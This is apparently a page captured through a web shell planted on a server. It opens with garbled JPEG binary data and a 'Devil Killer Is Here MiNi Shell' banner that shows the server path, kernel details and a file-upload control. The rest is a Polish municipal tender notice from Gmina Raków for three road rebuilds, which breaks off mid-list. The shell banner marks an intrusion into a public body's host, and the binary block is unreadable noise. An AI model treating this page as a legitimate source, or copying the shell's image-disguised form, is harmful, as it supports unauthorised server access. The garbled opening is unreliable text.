JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191011/608865-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 608865-N-2019 z dnia 2019-10-11 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Raków</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Nazwa zadania: 1.	Przebudowa ul. Klasztornej w Rakowie 2.	Przebudowa drogi w Pągowcu 3.	Przebudowa drogi w miejscowości Dębno</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Raków</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">29101064200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Ogrodowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">26-035</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Raków</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">świętokrzyskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">41 3535018, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">j.milewicz@rakow.pl, luiza50@wp.pl;a.pleban@rakow.pl; a.rejnowicz@rakow.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">41 3535018</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">bip.rakow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">bip.rakow.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy w Rakwoie ul. Ogrodowa 1, 26-035 Raków</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Nazwa zadania: 1.	Przebudowa ul. Klasztornej w Rakowie 2.	Przebudowa drogi w Pągowcu 3.	Przebudowa drogi w miejscowości Dębno</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">IPM.D.271.8.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia są roboty budowlane polegające na przebudowie dróg:1.	Przebudowa ul. Klasztornej w Rakowie;- odtworzenie trasy i punktów wysokościowych w terenie równinnym,- usunięcie warstwy urodzajnej humusu o średniej grubości 15cm. Strona lewa,- usunięcie warstwy urodzajnej humusu o średniej grubości 15cm. Strona prawa, - rozebranie powierzchni utwardzonych strona lewa (chodnik, zjazdy) z elementów betonowych wraz z ewentualną podbudową. Wliczono przylegające obrzeża w powierzchnię rozbiórki. Materiał z rozbiórki do odwozu lub utylizacji,	- rozebranie powierzchni utwardzonych strona prawa (chodnik, zjazdy) z elementów betonowych wraz z ewentualną podbudową. Wliczono przylegające obrzeża w powierzchnię rozbiórki. Materiał z rozbiórki do odwozu lub utylizacji,	- rozebranie konstrukcji jezdni (szerokości powyżej 6.0m) (nawierzchnia bitumiczna, podbudowy) z uzupełnieniem gruntem nasypowym pod przyszłychodnik/pobocze lub wyrównanie do poziomu terenu istn. Materiał z rozbiórki do odwozu lub utylizacji,	- likwidacja pionowych znaków drogowych - słupka + fundamentu.,	- likwidacja pionowych znaków drogowych - tarcz, tabliczek w ilości 3,00 szt,- rozebranie krawężników betonowych wraz z ławą betonową. Materiał z rozbiórki do odwozu lub utylizacji,	- korytowanie strona lewa, na głębokość 10 cm (po uprzednim odhumusowaniu) pod chodniki, zjazdy, z transportem urobku na odkład w gr. kat. I-V Wykonawca zapewni miejsce składowania własnym staraniem i na własny koszt,	- korytowanie strona prawa na głębokość 10 cm (po uprzednim odhumusowaniu) pod chodniki, zjazdy, z transportem urobku na odkład w gr. kat. I-V. Wykonawca zapewni miejsce składowania własnym staraniem i na własny koszt,	- profilowanie, zagęszczenie podłoża pod konstrukcje jezdni, chodników, zjazdów. Strona lewa,	- profilowanie, zagęszczenie podłoża pod konstrukcje jezdni, chodników, zjazdów. Strona prawa,	- w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie 0/31,5mm , gr. w-wy 15cm. Pod chodniki, zjazdy. Strona lewa,	- w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie 0/31,5mm , gr. w-wy 15cm. Pod chodniki, zjazdy. Strona prawa,	- frezowanie nawierzchni wyrównawcze na średnią głębokość 4cm,	- oczyszczenie, skropienie emulsją asfaltową nawierzchni po frezowaniu,- warstwa wyrównawcza z betonu asfaltowego AC16W gr. w-wy 6cm, transport mieszanki samochodami samowyład.,- warstwa ścieralna konstrukcji nawierzchni z betonu asfaltowego AC11S, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.,	- oznakowanie poziome jezdni materiałami grubowarstwowymi,	- ustawienie słupków z rur stalowych min. fi60 dla znaków drogowych wraz z fundamentem,- zakup, dostawa, przymocowanie tarcz znaków drogowych odblaskowych do słupków - typ 2,	- ściek przykrawężnikowy z kostki betonowej, szerokość ścieku 20cm, wykonywany na ławie betonowej 20cm,- krawężniki betonowe wystające lub obniżone o wymiarach 15x30 cm z wykonaniem ławy z betonu C12/15 z oporem po uprzednim korytowaniu na odpowiednią głębokość,	- obrzeża strona lewa (chodnik), betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie betonowej. Beton C12/15,	- obrzeża strona lewa (zjazdy), betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie betonowej. Beton C12/15,	- obrzeża strona prawa (chodnik), betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie betonowej. Beton C12/15,	- obrzeża strona prawa (zjazdy), betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie betonowej. Beton C12/15,	- chodniki, z kostki brukowej betonowej grubości 7 cm kolor żółty (oliwka), postarzana, nasiąkliwość wodą < 6%, grubość 7 cm, długość 22 cm, szerokość 16 cm układane na podsypce cementowo- piaskowej gr.3cm. Strona lewa chodnika,	- chodniki, z płyt ostrzegawczych dla osób niewidzących (przed przejściami dla pieszych) układane na podsypce cem- piaskowej gr.3cm. Strona lewa chodnika. Szerokość pasa płyt: 0.3m, dł. 4.2m,	- chodniki, z kostki brukowej betonowej grubości 7 cm kolor żółty (oliwka), postarzana, nasiąkliwość wodą < 6%, grubość 7 cm, długość 22 cm, szerokość 16 cm układane na podsypce cementowo- piaskowej gr.3cm. Strona prawa chodnika,	- chodniki, z płyt ostrzegawczych dla osób niewidzących (przed przejściami dla pieszych) układane na podsypce cem- piaskowej gr.3cm. Strona prawa chodnika. Szerokość pasa płyt: 0.3m, dł. 4.2m,	- zjazdy i dojścia z kostki brukowej betonowej grubości 7 cm kolor czerwona, postarzana, nasiąkliwość wodą < 6%, grubość 7 cm, długość 22 cm, szerokość 16 cm układane na podsypce cementowo- piaskowej gr.3cm. Strona lewa,	- zjazdy i dojścia z kostki brukowej betonowej grubości 7 cm kolor czerwona, postarzana, nasiąkliwość wodą < 6%, grubość 7 cm, długość 22 cm, szerokość 16 cm układane na podsypce cementowo- piaskowej gr.3cm. Strona prawa,	- regulacja pionowa pokryw studzienek kanalizacyjnych, telekomunikacyjnych, wpustów deszczowych,	- regulacja pionowa zasuw wodnych,	- zabezpieczenie otworu pomiędzy przepustem a wpustem deszczowym, za pomocą pokrywy betonowej. Wymiary płyty min. 1.5m x 1.1m	2.	Przebudowa drogi w Pągowcu- karczowanie drzew, krzaków, pni drzew, gałęzi w skrajni drogi wraz z utylizacją materiału po karczowaniu,- koryto wykonywane mechanicznie jednostronnie pod konstrukcję jezdni o szer. 0,5m-1,0m. Głębokość koryta 30cm. Pozyskany materiał wbudować w pobocza lub wywieść,- w-wa podbudowy pomocniczej z rumoszu skalnego stabilizowanego mechanicznie, gr. w-wy 10cm. Podbudowa pod konstrukcję jezdni,- w-wa podbudowy pomocniczej z rumoszu skalnego stabilizowanego mechanicznie, gr. w-wy 10cm. Podbudowa pod konstrukcję jezdni,- oczyszczenie i skropienie emulsją asfaltową,- warstwa wiążąca z betonu asfaltowego AC16W gr. w-wy 6cm, transport mieszanki samochodami samowyład,- warstwa ścieralna z betonu asfaltowego AC11S, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.- pobocza i zjazdy z krusyzwa łamanego o uziarnieniu 0/31,5 o szer. 0,75m. wraz z wyrównaniem gruntem. Grubość warstwy kruszywa: 10cm,- oznakowanie poziome jezdni.3.	Przebudowa drogi we miejscowości Dębno;Odcinek od drogi wojewódzkiej DW 764- Karczowanie drzew, krzaków, pni drzew, gałęzi w skrajni drogi wraz z utylizacją materiału po karczowaniu,- Rozebranie powierzchni utwardzonych (płyty chodnikowe betonowe, beton wylewany) wraz z ewentualną podbudową i ewentualnym korytowaniem na sumaryczną głębokość 30cm. Materiał z rozbiórki do odwozu lub utylizacji,- Rozebranie powierzchni utwardzonych (nawierzchnia asfaltowa) wraz z ewentualną podbudową i ewentualnym korytowaniem na sumaryczną głębokość 50cm. Materiał z rozbiórki do odwozu lub utylizacji,- Rozebranie powierzchni utwardzonych (nawierzchnia brukowa jezdni) wraz z ewentualną podbudową i ewentualnym korytowaniem na sumaryczną głębokość 50cm. Materiał z rozbiórki do odwozu lub utylizacji,- Rozebranie krawężników betonowych wraz z ławą betonową. Materiał z rozbiórki do odwozu lub utylizacji,- Wykonanie nasypów mechanicznie z gruntu pozyskanego przez Wykonawcę, spełniającego warunki określone w SST wraz z transportem, formowaniem i zagęszczaniem,- Koryto wykonywane mechanicznie na szerokości 2,3m pod chodnik. Głębokość koryta średnio 20 cm. Pozyskany materiał wbudować w pobocza lub wywieść,- Koryto wykonywane mechanicznie jednostronnie pod konstrukcję jezdni o szer. 0,7m. Głębokość koryta 30cm. Pozyskany materiał wbudować w pobocza lub wywieść,- Koryto wykonywane mechanicznie jednostronnie pod konstrukcję jezdni o szer. 1,0m. Głębokość koryta 40cm. Pozyskany materiał wbudować w pobocza lub wywieść,- W-wa podbudowy pomocniczej z rumoszu skalnego stabilizowanego mechanicznie, gr. w-wy 10cm. Podbudowa pod konstrukcję jezdni,- W-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/63 zaklinowanego kruszywem 0/31,5mm, gr. w-wy 20cm. Pod chodniki, zjazdy, konstrukcję jezdni,- Oczyszczenie i skropienie emulsją asfaltową,- Warstwa wiążąca z betonu asfaltowego AC16W gr. w-wy 5cm, transport mieszanki samochodami samowyład.,- Warstwa ścieralna z betonu asfaltowego AC11S, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.,- Krawężniki betonowe wystające lub obniżone o wymiarach 15x30 cm z wykonaniem ławy z betonu C12/15 z oporem na wysokość połowy krawężnika,- Chodniki i zjazdy z kostki brukowej betonowej grubości 8 cm, układane na podsypce cementowo-piaskowej 1:4 gr.3cm.,- Obrzeża betonowe o wymiarach 30x8 cm na podsypce cementowo - piaskowej, na ławie z betonu C12/15 z oporem,- Wykonanie ścieku przykrawężnikowego z kostki brukowej betonowej o gr. 8cm na ławie z betonu C12/15. Szerokość ścieku 20cm,- Wykonanie ścieków podchodnikowych z krawężników betonowych 15x30 na ławie z betonu C12/15, płyt chodnikowych 50x50x7 i częściowym uzupełniem z betonu C12/15,- Oznakowanie poziome jezdni,- Ustawienie słupków z rur stalowych dla znaków drogowych wraz z wykonaniem wykopu, fundamentu i zasypaniem dołów z ubiciem warstwami,- Tablice znaków drogowych kat. A,B,C,D,T mocowane do słupków stalowych,- Pobocza i zjazdy z kruszywa łamanego o uziarnieniu 0/31,5 o szer. 0,75m. wraz z wyrównaniem gruntem. Grubość warstwy kruszywa: 10cm,- Regulacja pionowa studzienek kanalizacyjnych,- Regulacja pionowa zasuw i hydrantów sieci wodociągowej,- Przebudowa hydrantów nadziemnych na podziemne. Hydranty zlokalizowane w chodniku.Odcinek od drogi powiatowej 0349T- Geodezyjne wytyczenie granicy pasa drogowego w terenie,- Karczowanie drzew, krzaków, pni drzew, gałęzi w skrajni drogi wraz z utylizacją materiału po karczowaniu,- Wykonanie robót ziemnych polegających na mechanicznym profilowaniu skarpy z transportem urobku na nasyp lub wbudowanie z pobocza w gr. kat. I-V. pozyskany materiał do wbudowania w pobocza, nadmiar mas ziemnych do odwozu poza teren budowy,- Remont przepustów rur betonowych o śr. 400mm wraz z robotami ziemnymi, wykonaniem ławy z kruszywa 0/31,5 gr. min. 15cm oraz obsypką z piasku,- Remont ścianki czołowej przepustu dla rur betonowych o śr. 400mm. Rozbiórka istniejącej ścianki i jej ponowy montaż do wykonaniu remontu przepustu wraz z robotami ziemnymi, wykonaniem ławy z kruszywa 0/31,5 gr. min. 15cm oraz obsypką z piasku,- Ścięcie, profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni jezdni i poboczy, wykonywane mechanicznie przy użyciu równiarki samojezdnej i walca statycznego,- W-wa podbudowy pomocniczej z rumoszu skalnego stabilizowanego mechanicznie, gr. w-wy 15cm. Podbudowa pod konstrukcję jezdni,- W-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/63 zaklinowanego kruszywem 0/31,5mm, gr. w-wy 20cm. Pod chodniki, zjazdy, konstrukcję jezdni,- Warstwa wiążąca z betonu asfaltowego AC16W gr. w-wy 5cm, transport mieszanki samochodami samowyład,- Warstwa ścieralna z betonu asfaltowego AC11S, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.,- Pobocza i zjazdy z kruszywa łamanego o uziarnieniu 0/31,5 o szer. 0,75m. wraz z wyrównaniem gruntem. Grubość warstwy kruszywa: 10cm,- Odmulenie rowu przydrożnego. Średnia głębokość odmulenia 40cm. Materiał wbudować w pobocza lub wywieść,- Ustawienie słupków z rur 